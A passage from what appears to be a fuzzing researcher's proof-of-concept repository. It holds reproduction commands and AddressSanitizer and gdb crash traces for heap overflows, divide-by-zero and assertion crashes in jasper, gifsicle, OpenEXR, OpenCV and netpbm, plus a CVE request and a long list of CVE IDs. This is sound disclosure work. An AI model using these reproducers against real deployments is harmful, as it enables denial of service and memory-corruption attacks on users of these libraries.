/data/xqx/tests/libjasper-test/jasper/src/libjasper/jpc/jpc_t1cod.c:144: JPC_NOMINALGAIN: Assertio 24 | n `qmfbid == 0x01' failed. 25 | Aborted 26 | ``` 27 | 28 | ### 004-jasper-aborted-4 29 | jasper -f $FILE -t jpc -F /tmp/out.pnm -T pnm 30 | ``` 31 | warning: trailing garbage in marker segment (15 bytes) 32 | jasper: /data/xqx/tests/libjasper-test/jasper/src/libjasper/jpc/jpc_t1cod.c:144: JPC_NOMINALGAIN: Assertion `qmfbid == 0x01' failed. 33 | Aborted 34 | ``` 35 | 36 | ### 005-jasper-aborted-5 37 | jasper -f $FILE -t jpc -F /tmp/out.pnm -T pnm 38 | ``` 39 | warning: ignoring trailing garbage (1 bytes) 40 | jasper: /data/xqx/tests/libjasper-test/jasper/src/libjasper/jpc/jpc_dec.c:1883: jpc_dequantize: Assertion `absstepsize >= 0' failed. 41 | Aborted 42 | ``` 43 | 44 | ### 006-jasper-aborted-6 45 | jasper -f $FILE -t jpc -F /tmp/out.pnm -T pnm 46 | ``` 47 | warning: ignoring unknown marker segment (0xff7e) 48 | type = 0xff7e (UNKNOWN); len = 20;01 40 40 ff ff 80 00 48 50 40 48 50 48 48 50 48 48 50 warning: trailing garbage in marker segment (1 bytes) 49 | warning: ignoring unknown marker segment (0xff0d) 50 | type = 0xff0d (UNKNOWN); len = 20;00 40 40 00 00 00 00 00 00 00 00 e9 00 ff 80 e9 00 00 jasper: /data/xqx/tests/libjasper-test/jasper/src/libjasper/jpc/jpc_dec.c:1883: jpc_dequantize: Assertion `absstepsize >= 0' failed. 51 | Aborted 52 | ``` 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | -------------------------------------------------------------------------------- /gifsicle/readme.md: -------------------------------------------------------------------------------- 1 | gifsicle 2 | ============ 3 | 4 | 5 | ## 1. gifsicle --dither 6 | 7 | ``` 8 | $ /gifsicle --dither --use-col=bw poc-1 -o /dev/null 9 | 10 | gifsicle:./crashes/gifsicle-dither-fuzz003:id:000000,sig:06,src:000753,op:havoc,rep:8:#1: read error: unknown block type 206 at file offset 161 11 | gifsicle:./crashes/gifsicle-dither-fuzz003:id:000000,sig:06,src:000753,op:havoc,rep:8:#0: read error: image corrupted, min_code_size too small 12 | gifsicle:./crashes/gifsicle-dither-fuzz003:id:000000,sig:06,src:000753,op:havoc,rep:8:#0: read error: image corrupted, code out of range (19 times) 13 | gifsicle:./crashes/gifsicle-dither-fuzz003:id:000000,sig:06,src:000753,op:havoc,rep:8:#0: read error: (not reporting more errors) 14 | gifsicle:./crashes/gifsicle-dither-fuzz003:id:000000,sig:06,src:000753,op:havoc,rep:8:#0: warning: 115 superfluous pixels of image data 15 | gifsicle:./crashes/gifsicle-dither-fuzz003:id:000000,sig:06,src:000753,op:havoc,rep:8:#1: read error: image corrupted, min_code_size too small 16 | gifsicle:./crashes/gifsicle-dither-fuzz003:id:000000,sig:06,src:000753,op:havoc,rep:8:#1: read error: image corrupted, code out of range (3 times) 17 | gifsicle:./crashes/gifsicle-dither-fuzz003:id:000000,sig:06,src:000753,op:havoc,rep:8:#1: read error: missing 16 pixels of image data 18 | ASAN:SIGSEGV 19 | ================================================================= 20 | ==74==ERROR: AddressSanitizer: SEGV on unknown address 0x61ae787a69f4 (pc 0x0000004ad06f bp 0x60300000ed42 sp 0x7fffffffd690 T0) 21 | #0 0x4ad06e in kc_distance ../../gifsicle/src/kcolor.h:113 22 | #1 0x4ad06e in colormap_image_floyd_steinberg ../../gifsicle/src/quantize.c:1149 23 | #2 0x4b3a07 in dither ../../gifsicle/src/quantize.c:1488 24 | #3 0x4b3a07 in colormap_stream ../../gifsicle/src/quantize.c:1613 25 | #4 0x4f4d3c in do_colormap_change ../../gifsicle/src/gifsicle.c:904 26 | #5 0x4f4d3c in merge_and_write_frames ../../gifsicle/src/gifsicle.c:1030 27 | #6 0x4f9116 in output_frames ../../gifsicle/src/gifsicle.c:1105 28 | #7 0x4096ec in main ../../gifsicle/src/gifsicle.c:2173 29 | #8 0x7ffff659a82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) 30 | #9 0x40ae88 in _start (/src/aflbuild/installed/bin/gifsicle+0x40ae88) 31 | 32 | AddressSanitizer can not provide additional info. 33 | SUMMARY: AddressSanitizer: SEGV ../../gifsicle/src/kcolor.h:113 kc_distance 34 | ==74==ABORTING 35 | ``` 36 | -------------------------------------------------------------------------------- /cve-request/cve-request-2.txt: -------------------------------------------------------------------------------- 1 | Description: 2 | OpenEXR is a high dynamic-range (HDR) image file format developed by Industrial 3 | Light & Magic for use in computer imaging applications. 4 | 5 | A crafted image causes a heap overflow in the latest version 2.2 6 | And this issue also exsits in the latest commit of github repo. 7 | (https://github.com/openexr/openexr) 8 | 9 | 10 | 11 | The complete ASan output: 12 | ./exrmaketiled ./bug-testcase/185-openexr-heapoverflow /tmp/out 13 | ================================================================= 14 | ==18567==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x63100003c7fe at pc 0x7fc23e95a5ab bp 0x7ffe0428e7e0 sp 0x7ffe0428e7d8 15 | READ of size 2 at 0x63100003c7fe thread T0 16 | #0 0x7fc23e95a5aa in hufDecode ../../openexr/OpenEXR/IlmImf/ImfHuf.cpp:898 17 | #1 0x7fc23e95a5aa in Imf_2_2::hufUncompress(char const*, int, unsigned short*, int) ../../openexr/OpenEXR/IlmImf/ImfHuf.cpp:1101 18 | #2 0x7fc23e971ca7 in Imf_2_2::PizCompressor::uncompress(char const*, int, Imath_2_2::Box >, char const*&) ../../openexr/OpenEXR/IlmImf/ImfPizCompressor.cpp:576 19 | #3 0x7fc23e974663 in Imf_2_2::PizCompressor::uncompress(char const*, int, int, char const*&) ../../openexr/OpenEXR/IlmImf/ImfPizCompressor.cpp:288 20 | #4 0x7fc23ea66bb7 in execute ../../openexr/OpenEXR/IlmImf/ImfScanLineInputFile.cpp:544 21 | #5 0x7fc23d4081ea in IlmThread_2_2::ThreadPool::addTask(IlmThread_2_2::Task*) ../../openexr/IlmBase/IlmThread/IlmThreadPool.cpp:433 22 | #6 0x7fc23ea7c136 in Imf_2_2::ScanLineInputFile::readPixels(int, int) ../../openexr/OpenEXR/IlmImf/ImfScanLineInputFile.cpp:1617 23 | #7 0x7fc23e904c7c in Imf_2_2::InputFile::readPixels(int, int) ../../openexr/OpenEXR/IlmImf/ImfInputFile.cpp:815 24 | #8 0x4236ed in makeTiled(char const*, char const*, int, Imf_2_2::LevelMode, Imf_2_2::LevelRoundingMode, Imf_2_2::Compression, int, int, std::set, std::allocator > const&, Extrapolation, Extrapolation, bool) ../../openexr/OpenEXR/exrmaketiled/makeTiled.cpp:572 25 | #9 0x405283 in main ../../openexr/OpenEXR/exrmaketiled/main.cpp:426 26 | #10 0x7fc23dd55f44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21f44) 27 | #11 0x40692c (/data/xqx/tests/openexr-test/aflbuild/build-openexr/install/bin/exrmaketiled+0x40692c) 28 | 29 | 30 | 31 | 32 | Affected version: 33 | the Latest version 2.2.0, and also in the latest commit 1cce277. 34 | 35 | Fixed version: 36 | N/A 37 | 38 | Commit fix: 39 | N/A 40 | 41 | Credit: 42 | the bug is found by Qixue Xiao and Kang Li. 43 | 44 | 45 | CVE: 46 | N/A 47 | 48 | Reproducer: 49 | https://github.com/xiaoqx/pocs/blob/master/openexr.md 50 | https://github.com/xiaoqx/pocs/blob/master/openexr/185-openexr-heapoverflow 51 | 52 | Timeline: 53 | 2017-07-29: bug discovered and reported upstream 54 | https://github.com/openexr/openexr/issues/238 55 | 56 | 57 | Note: 58 | This bug was found with American Fuzzy Lop. 59 | 60 | 61 | -- 62 | xiaoqixue_1@163.com 63 | 64 | 65 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | pocs of tested targets 2 | ================= 3 | 4 | this work done with 360 TeamSeri0us 5 | 6 | ## opencv 7 | 8 | ### CVE-2017-12597 9 | ### CVE-2017-12598 10 | ### CVE-2017-12599 11 | ### CVE-2017-12600 12 | ### CVE-2017-12601 13 | ### CVE-2017-12602 14 | ### CVE-2017-12603 15 | ### CVE-2017-12604 16 | ### CVE-2017-12605 17 | ### CVE-2017-12606 18 | ### CVE-2017-14136 19 | 20 | 21 | ## libjasper 22 | ### CVE-2017-9782 23 | 24 | ## openEXR 25 | ### CVE-2017-12596 26 | 27 | ## wave.py (python) 28 | ### CVE-2017-14144 29 | 30 | ## numpy 31 | ### CVE-2017-12852 32 | 33 | ## hdf5 34 | 35 | ### CVE-2017-17505 36 | ### CVE-2017-17506 37 | ### CVE-2017-17507 38 | ### CVE-2017-17508 39 | ### CVE-2017-17509 40 | 41 | ## libtiff 42 | ### CVE-2018-7456 43 | 44 | ## cimg 45 | 46 | ### CVE-2018-7587. 47 | ### CVE-2018-7588. 48 | ### CVE-2018-7589. 49 | ### CVE-2018-7637. 50 | ### CVE-2018-7638. 51 | ### CVE-2018-7639. 52 | ### CVE-2018-7640. 53 | ### CVE-2018-7641. 54 | 55 | ## opencv 56 | (assert-dos) 57 | ### CVE-2018-7712 58 | ### CVE-2018-7713 59 | ### CVE-2018-7714 60 | 61 | ## netpbm 62 | ### CVE-2018-8975. 63 | 64 | ## exiv2 65 | ### CVE-2018-8976. 66 | ### CVE-2018-8977 67 | 68 | ### CVE-2018-9144 69 | ### CVE-2018-9145 70 | ### CVE-2018-9146 71 | 72 | ## libjasper 73 | ### CVE-2018-9055(pwd) 74 | ### CVE-2018-9252(pwd) 75 | 76 | ## exiv2 77 | ### CVE-2018-9303. 78 | ### CVE-2018-9304. 79 | ### CVE-2018-9305. 80 | ### CVE-2018-9306. 81 | ### CVE-2018-12264 82 | ### CVE-2018-12265. 83 | 84 | ## cms 85 | ### CVE-2018-11555 86 | ### CVE-2018-11556 87 | 88 | ## sam2p 89 | ### CVE-2018-12578 (pwd) 90 | ### CVE-2018-12601 (pwd) 91 | 92 | ## exempi 93 | 94 | ### CVE-2018-12648 95 | ### CVE-2018-13414 96 | 97 | ## mupdf 98 | ### CVE-2018-13413 99 | 100 | 101 | ## hdf5 102 | ### CVE-2018-13866. 103 | ### CVE-2018-13867. 104 | ### CVE-2018-13868. 105 | ### CVE-2018-13869. 106 | ### CVE-2018-13870. 107 | ### CVE-2018-13871. 108 | ### CVE-2018-13872. 109 | ### CVE-2018-13873. 110 | ### CVE-2018-13874. 111 | ### CVE-2018-13875. 112 | ### CVE-2018-13876. 113 | ### CVE-2018-14031. 114 | ### CVE-2018-14032. 115 | ### CVE-2018-14033. 116 | ### CVE-2018-14034. 117 | ### CVE-2018-14035. 118 | 119 | ## exiv2 120 | 121 | ### CVE-2018-14046 122 | 123 | 124 | ## libSoundTouch 125 | 126 | ### CVE-2018-14044 127 | ### CVE-2018-14045 128 | 129 | ## gegl 130 | 131 | ### CVE-2018-10111 132 | ### CVE-2018-10112 133 | ### CVE-2018-10113 134 | ### CVE-2018-10114 135 | 136 | ## hdf5 137 | 138 | ### CVE-2018-13866. 139 | ### CVE-2018-13867. 140 | ### CVE-2018-13868. 141 | ### CVE-2018-13869. 142 | ### CVE-2018-13870. 143 | ### CVE-2018-13871. 144 | ### CVE-2018-13872. 145 | ### CVE-2018-13873. 146 | ### CVE-2018-13874. 147 | ### CVE-2018-13875. 148 | ### CVE-2018-13876. 149 | ### CVE-2018-14031. 150 | ### CVE-2018-14032. 151 | ### CVE-2018-14033. 152 | ### CVE-2018-14034. 153 | ### CVE-2018-14035. 154 | 155 | ## libgig 156 | 157 | ### CVE-2018-14449. 158 | ### CVE-2018-14450. 159 | ### CVE-2018-14451. 160 | ### CVE-2018-14452. 161 | ### CVE-2018-14453. 162 | ### CVE-2018-14454. 163 | ### CVE-2018-14455. 164 | ### CVE-2018-14456. 165 | ### CVE-2018-14457. 166 | ### CVE-2018-14458. 167 | ### CVE-2018-14459. 168 | ### CVE-2018-14460. 169 | 170 | 171 | 172 | 173 | -------------------------------------------------------------------------------- /opencv/dos-by-assert/readme.md: -------------------------------------------------------------------------------- 1 | DOS by assert in opencv library 2 | ================== 3 | 4 | ## 1. opencv-assert-dos-1 5 | 6 | ``` 7 | Starting program: /work/test-driver/opencv_test.elf ../crashes/dos-1 8 | [Thread debugging using libthread_db enabled] 9 | Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". 10 | OpenCV(3.4.1-dev) Error: Assertion failed (pixels <= (1<<30)) in validateInputImageSize, file /src/opencv/modules/imgcodecs/src/loadsave.cpp, line 74 11 | terminate called after throwing an instance of 'cv::Exception' 12 | what(): OpenCV(3.4.1-dev) /src/opencv/modules/imgcodecs/src/loadsave.cpp:74: error: (-215) pixels <= (1<<30) in function validateInputImageSize 13 | 14 | 15 | Program received signal SIGABRT, Aborted. 16 | 0x00007ffff1d52428 in __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:54 17 | 54 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory. 18 | (gdb) bt 19 | #0 0x00007ffff1d52428 in __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:54 20 | #1 0x00007ffff1d5402a in __GI_abort () at abort.c:89 21 | #2 0x00007ffff238c84d in __gnu_cxx::__verbose_terminate_handler() () from /usr/lib/x86_64-linux-gnu/libstdc++.so.6 22 | #3 0x00007ffff238a6b6 in ?? () from /usr/lib/x86_64-linux-gnu/libstdc++.so.6 23 | #4 0x00007ffff238a701 in std::terminate() () from /usr/lib/x86_64-linux-gnu/libstdc++.so.6 24 | #5 0x00007ffff238a919 in __cxa_throw () from /usr/lib/x86_64-linux-gnu/libstdc++.so.6 25 | #6 0x00007ffff27ef928 in cv::error (exc=...) at /src/opencv/modules/core/src/system.cpp:914 26 | #7 0x00007ffff27efcc1 in cv::error (_code=_code@entry=-215, _err=..., _func=_func@entry=0x7ffff7875b30 const&)::__func__> "validateInputImageSize", 27 | _file=_file@entry=0x7ffff7875818 "/src/opencv/modules/imgcodecs/src/loadsave.cpp", _line=_line@entry=74) at /src/opencv/modules/core/src/system.cpp:919 28 | #8 0x00007ffff7228af1 in cv::validateInputImageSize (size=...) at /src/opencv/modules/imgcodecs/src/loadsave.cpp:74 29 | #9 0x00007ffff722dd1b in cv::imread_ (filename=..., flags=flags@entry=1, hdrtype=hdrtype@entry=2, mat=mat@entry=0x7fffffffe4a0) at /src/opencv/modules/imgcodecs/src/loadsave.cpp:451 30 | #10 0x00007ffff72302bd in cv::imread (filename=..., flags=1) at /src/opencv/modules/imgcodecs/src/loadsave.cpp:641 31 | #11 0x0000000000400e69 in main () 32 | ``` 33 | 34 | ## 2. opencv-assert-dos-2 35 | 36 | ``` 37 | Starting program: /work/test-driver/opencv_test.elf ../crashes/dos-2 38 | [Thread debugging using libthread_db enabled] 39 | Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". 40 | OpenCV(3.4.1-dev) Error: Assertion failed (size.width <= (1<<20)) in validateInputImageSize, file /src/opencv/modules/imgcodecs/src/loadsave.cpp, line 70 41 | terminate called after throwing an instance of 'cv::Exception' 42 | what(): OpenCV(3.4.1-dev) /src/opencv/modules/imgcodecs/src/loadsave.cpp:70: error: (-215) size.width <= (1<<20) in function validateInputImageSize 43 | 44 | 45 | Program received signal SIGABRT, Aborted. 46 | 0x00007ffff1d52428 in __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:54 47 | 54 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory. 48 | (gdb) bt 49 | #0 0x00007ffff1d52428 in __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:54 50 | #1 0x00007ffff1d5402a in __GI_abort () at abort.c:89 51 | #2 0x00007ffff238c84d in __gnu_cxx::__verbose_terminate_handler() () from /usr/lib/x86_64-linux-gnu/libstdc++.so.6 52 | #3 0x00007ffff238a6b6 in ?? () from /usr/lib/x86_64-linux-gnu/libstdc++.so.6 53 | #4 0x00007ffff238a701 in std::terminate() () from /usr/lib/x86_64-linux-gnu/libstdc++.so.6 54 | #5 0x00007ffff238a919 in __cxa_throw () from /usr/lib/x86_64-linux-gnu/libstdc++.so.6 55 | #6 0x00007ffff27ef928 in cv::error (exc=...) at /src/opencv/modules/core/src/system.cpp:914 56 | #7 0x00007ffff27efcc1 in cv::error (_code=_code@entry=-215, _err=..., _func=_func@entry=0x7ffff7875b30 const&)::__func__> "validateInputImageSize", 57 | _file=_file@entry=0x7ffff7875818 "/src/opencv/modules/imgcodecs/src/loadsave.cpp", _line=_line@entry=70) at /src/opencv/modules/core/src/system.cpp:919 58 | #8 0x00007ffff7228bf0 in cv::validateInputImageSize (size=...) at /src/opencv/modules/imgcodecs/src/loadsave.cpp:70 59 | #9 0x00007ffff722dd1b in cv::imread_ (filename=..., flags=flags@entry=1, hdrtype=hdrtype@entry=2, mat=mat@entry=0x7fffffffe4a0) at /src/opencv/modules/imgcodecs/src/loadsave.cpp:451 60 | #10 0x00007ffff72302bd in cv::imread (filename=..., flags=1) at /src/opencv/modules/imgcodecs/src/loadsave.cpp:641 61 | #11 0x0000000000400e69 in main () 62 | 63 | 64 | ``` 65 | 66 | 67 | 68 | 69 | 70 | ## 3. opencv-assert-dos-3 71 | 72 | ``` 73 | Starting program: /work/test-driver/opencv_test.elf ../crashes/dos-3 74 | [Thread debugging using libthread_db enabled] 75 | Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". 76 | OpenCV(3.4.1-dev) Error: Assertion failed (size.height <= (1<<20)) in validateInputImageSize, file /src/opencv/modules/imgcodecs/src/loadsave.cpp, line 72 77 | terminate called after throwing an instance of 'cv::Exception' 78 | what(): OpenCV(3.4.1-dev) /src/opencv/modules/imgcodecs/src/loadsave.cpp:72: error: (-215) size.height <= (1<<20) in function validateInputImageSize 79 | 80 | 81 | Program received signal SIGABRT, Aborted. 82 | 0x00007ffff1d52428 in __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:54 83 | 54 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory. 84 | (gdb) bt 85 | #0 0x00007ffff1d52428 in __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:54 86 | #1 0x00007ffff1d5402a in __GI_abort () at abort.c:89 87 | #2 0x00007ffff238c84d in __gnu_cxx::__verbose_terminate_handler() () from /usr/lib/x86_64-linux-gnu/libstdc++.so.6 88 | #3 0x00007ffff238a6b6 in ?? () from /usr/lib/x86_64-linux-gnu/libstdc++.so.6 89 | #4 0x00007ffff238a701 in std::terminate() () from /usr/lib/x86_64-linux-gnu/libstdc++.so.6 90 | #5 0x00007ffff238a919 in __cxa_throw () from /usr/lib/x86_64-linux-gnu/libstdc++.so.6 91 | #6 0x00007ffff27ef928 in cv::error (exc=...) at /src/opencv/modules/core/src/system.cpp:914 92 | #7 0x00007ffff27efcc1 in cv::error (_code=_code@entry=-215, _err=..., _func=_func@entry=0x7ffff7875b30 const&)::__func__> "validateInputImageSize", 93 | _file=_file@entry=0x7ffff7875818 "/src/opencv/modules/imgcodecs/src/loadsave.cpp", _line=_line@entry=72) at /src/opencv/modules/core/src/system.cpp:919 94 | #8 0x00007ffff7228b75 in cv::validateInputImageSize (size=...) at /src/opencv/modules/imgcodecs/src/loadsave.cpp:72 95 | #9 0x00007ffff722dd1b in cv::imread_ (filename=..., flags=flags@entry=1, hdrtype=hdrtype@entry=2, mat=mat@entry=0x7fffffffe4a0) at /src/opencv/modules/imgcodecs/src/loadsave.cpp:451 96 | #10 0x00007ffff72302bd in cv::imread (filename=..., flags=1) at /src/opencv/modules/imgcodecs/src/loadsave.cpp:641 97 | #11 0x0000000000400e69 in main () 98 | 99 | 100 | ``` 101 | 102 | 103 | 104 | 105 | -------------------------------------------------------------------------------- /netpbm/readme.md: -------------------------------------------------------------------------------- 1 | pocs of netpbm 2 | ======================== 3 | 4 | ## 1. pstopnm-divbyzero-1 5 | 6 | A divided by zero results to dos in pstopnm tool. 7 | the bug is in computeSizeResBlind function because of imageHeight is zero. 8 | 9 | 10 | ``` 11 | $ gdb --args pstopnm ./pstopnm-divbyzero-1 12 | 13 | Starting program: /src/netpbm-trunk/converter/other/pstopnm /work/pstopnm-divbyzero-1 14 | [Thread debugging using libthread_db enabled] 15 | Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". 16 | 17 | Program received signal SIGFPE, Arithmetic exception. 18 | 0x0000000000402dd6 in computeSizeResBlind (xmax=612, ymax=792, imageWidth=165, imageHeight=0, nocrop=false, imageDimP=0x7fffffffe450) at pstopnm.c:313 19 | 313 imageDimP->xres = imageDimP->yres = MIN(xmax * 72 / imageWidth, 20 | (gdb) bt 21 | #0 0x0000000000402dd6 in computeSizeResBlind (xmax=612, ymax=792, imageWidth=165, imageHeight=0, nocrop=false, imageDimP=0x7fffffffe450) at pstopnm.c:313 22 | #1 0x00000000004030ab in computeSizeRes (cmdline=..., borderedBox=..., imageDimP=0x7fffffffe450) at pstopnm.c:369 23 | #2 0x00000000004044b8 in main (argc=2, argv=0x7fffffffe5c8) at pstopnm.c:1032 24 | 25 | ``` 26 | 27 | ## 2. pstopnm-divbyzero-2 28 | 29 | 30 | ``` 31 | $ gdb --args pstopnm ./pstopnm-divbyzero-2 32 | 33 | [Thread debugging using libthread_db enabled] 34 | Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". 35 | pstopnm: Writing ppmraw format 36 | 37 | Program received signal SIGFPE, Arithmetic exception. 38 | 0x000000000040374e in writePstrans (box=..., d=..., orientation=LANDSCAPE, pipeToGsP=0x61600000f680) at pstopnm.c:633 39 | 633 llx = box.llx - (xsize * 72 / xres - (box.urx - box.llx)) / 2; 40 | (gdb) pstopnm: execl() of Ghostscript ('/usr/bin/gs') failed, errno=2 (No such file or directory) 41 | 42 | (gdb) bt 43 | #0 0x000000000040374e in writePstrans (box=..., d=..., orientation=LANDSCAPE, pipeToGsP=0x61600000f680) at pstopnm.c:633 44 | #1 0x0000000000403f5a in feedPsToGhostScript (inputFileName=0x60300000efe0 "/work/pstopnm-divbyzero-2", borderedBox=..., imageDim=..., orientation=LANDSCAPE, 45 | pipeToGhostscriptFd=4, language=COMMON_POSTSCRIPT) at pstopnm.c:868 46 | #2 0x000000000040426e in executeGhostscript (inputFileName=0x60300000efe0 "/work/pstopnm-divbyzero-2", borderedBox=..., imageDim=..., orientation=LANDSCAPE, 47 | ghostscriptDevice=0x60200000eff0 "ppmraw", outfileArg=0x60400000dfd0 "/work/pstopnm-divbyzero-2%03d.ppm", textalphabits=4, language=COMMON_POSTSCRIPT) 48 | at pstopnm.c:971 49 | #3 0x0000000000404569 in main (argc=2, argv=0x7fffffffe5c8) at pstopnm.c:1041 50 | ``` 51 | 52 | ## 3. tifftopnm-heapoverflow-1 53 | 54 | ``` 55 | $ pstopnm ./tifftopnm-heapoverflow-1 56 | 57 | ==19==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000ef14 at pc 0x000000405402 bp 0x7fff16aa45f0 sp 0x7fff16aa45e0 58 | READ of size 1 at 0x60200000ef14 thread T0 59 | #0 0x405401 (/src/aflbuild/installed/bin/tifftopnm+0x405401) 60 | #1 0x406b91 (/src/aflbuild/installed/bin/tifftopnm+0x406b91) 61 | #2 0x403115 (/src/aflbuild/installed/bin/tifftopnm+0x403115) 62 | #3 0x7ffb37fb082f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) 63 | #4 0x4039e8 (/src/aflbuild/installed/bin/tifftopnm+0x4039e8) 64 | 65 | 0x60200000ef14 is located 0 bytes to the right of 4-byte region [0x60200000ef10,0x60200000ef14) 66 | allocated by thread T0 here: 67 | #0 0x7ffb3895e602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) 68 | #1 0x4063ae (/src/aflbuild/installed/bin/tifftopnm+0x4063ae) 69 | 70 | SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 ?? 71 | Shadow bytes around the buggy address: 72 | 0x0c047fff9d90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 73 | 0x0c047fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 74 | 0x0c047fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 75 | 0x0c047fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 76 | 0x0c047fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 77 | =>0x0c047fff9de0: fa fa[04]fa fa fa fd fa fa fa fd fa fa fa fd fa 78 | 0x0c047fff9df0: fa fa fd fa fa fa fd fa fa fa fd fd fa fa 00 00 79 | 0x0c047fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 80 | 0x0c047fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 81 | 0x0c047fff9e20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 82 | 0x0c047fff9e30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 83 | Shadow byte legend (one shadow byte represents 8 application bytes): 84 | Addressable: 00 85 | Partially addressable: 01 02 03 04 05 06 07 86 | Heap left redzone: fa 87 | Heap right redzone: fb 88 | Freed heap region: fd 89 | Stack left redzone: f1 90 | Stack mid redzone: f2 91 | Stack right redzone: f3 92 | Stack partial redzone: f4 93 | Stack after return: f5 94 | Stack use after scope: f8 95 | Global redzone: f9 96 | Global init order: f6 97 | Poisoned by user: f7 98 | Container overflow: fc 99 | Array cookie: ac 100 | Intra object redzone: bb 101 | ASan internal: fe 102 | ==19==ABORTING 103 | 104 | ``` 105 | ## 4. pbmmask-heapoverflow-1 106 | 107 | ``` 108 | $ gdb --args pbmmask $POC 109 | 110 | ==28==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000efef at pc 0x00000040527d bp 0x7fffffffe4f0 sp 0x7fffffffe4e0 111 | READ of size 1 at 0x60200000efef thread T0 112 | #0 0x40527c (/src/aflbuild/installed/bin/pbmmask+0x40527c) 113 | #1 0x7ffff67c882f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) 114 | #2 0x405548 (/src/aflbuild/installed/bin/pbmmask+0x405548) 115 | 116 | 0x60200000efef is located 1 bytes to the left of 1-byte region [0x60200000eff0,0x60200000eff1) 117 | allocated by thread T0 here: 118 | #0 0x7ffff6f02602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) 119 | #1 0x7ffff6c1d704 in mallocz /src/netpbm/lib/util/mallocvar.c:15 120 | #2 0x7ffff6c1d704 in allocRowHeap /src/netpbm/lib/util/mallocvar.c:68 121 | #3 0x7ffff6c1d704 in pm_mallocarray2 /src/netpbm/lib/util/mallocvar.c:117 122 | #4 0x6075bf (/src/aflbuild/installed/bin/pbmmask+0x6075bf) 123 | 124 | SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 ?? 125 | Shadow bytes around the buggy address: 126 | 0x0c047fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 127 | 0x0c047fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 128 | 0x0c047fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 129 | 0x0c047fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 130 | 0x0c047fff9de0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 131 | =>0x0c047fff9df0: fa fa fa fa fa fa fa fa fa fa 01 fa fa[fa]01 fa 132 | 0x0c047fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 133 | 0x0c047fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 134 | 0x0c047fff9e20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 135 | 0x0c047fff9e30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 136 | 0x0c047fff9e40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 137 | Shadow byte legend (one shadow byte represents 8 application bytes): 138 | Addressable: 00 139 | Partially addressable: 01 02 03 04 05 06 07 140 | Heap left redzone: fa 141 | Heap right redzone: fb 142 | Freed heap region: fd 143 | Stack left redzone: f1 144 | Stack mid redzone: f2 145 | Stack right redzone: f3 146 | Stack partial redzone: f4 147 | Stack after return: f5 148 | Stack use after scope: f8 149 | Global redzone: f9 150 | Global init order: f6 151 | Poisoned by user: f7 152 | Container overflow: fc 153 | Array cookie: ac 154 | Intra object redzone: bb 155 | ASan internal: fe 156 | ==28==ABORTING 157 | 158 | 159 | ``` 160 | -------------------------------------------------------------------------------- /openexr.md: -------------------------------------------------------------------------------- 1 | 2 | OpenEXR 3 | ========================= 4 | 5 | # exrmaketiled 6 | 7 | ./exrmaketiled ./bug-testcase/185-openexr-heapoverflow /tmp/out 8 | ``` 9 | ================================================================= 10 | ==18567==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x63100003c7fe at pc 0x7fc23e95a5ab bp 0x7ffe0428e7e0 sp 0x7ffe0428e7d8 11 | READ of size 2 at 0x63100003c7fe thread T0 12 | #0 0x7fc23e95a5aa in hufDecode ../../openexr/OpenEXR/IlmImf/ImfHuf.cpp:898 13 | #1 0x7fc23e95a5aa in Imf_2_2::hufUncompress(char const*, int, unsigned short*, int) ../../openexr/OpenEXR/IlmImf/ImfHuf.cpp:1101 14 | #2 0x7fc23e971ca7 in Imf_2_2::PizCompressor::uncompress(char const*, int, Imath_2_2::Box >, char const*&) ../../openexr/OpenEXR/IlmImf/ImfPizCompressor.cpp:576 15 | #3 0x7fc23e974663 in Imf_2_2::PizCompressor::uncompress(char 